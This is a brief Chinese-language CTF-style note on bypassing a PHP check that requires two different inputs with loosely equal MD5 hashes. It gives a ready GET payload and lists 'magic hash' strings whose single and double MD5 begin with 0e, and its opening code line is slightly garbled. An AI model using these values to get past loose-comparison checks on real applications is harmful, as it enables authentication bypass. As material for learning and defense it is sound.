$a=(string)$_GET['a'];$b=(string)$_GET['b'];$a !== $bmd5($a) == md5($b)
强制类型变换后如果传入数组,则$a===$b===string(5) “Array”
绕过方法:md5后都为0弱比较,
原理:为0e开头的在进行==弱比较时会被识别为科学记数法,结果均为0,所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。
payload:
?a=QNKCDZO&b=240610708
附1:md5开头为0e
- QNKCDZO
- 240610708
- s878926199a
- s155964671a
- s214587387a
附2:两次md5开头为0e
- CbDLytmyGm2xQyaLNhWn
- 770hQgrBOjrcqftrlaZk
- 7r4lGXCH2Ksu2JNT3BYM
若有收获,就点个赞吧
0 人点赞
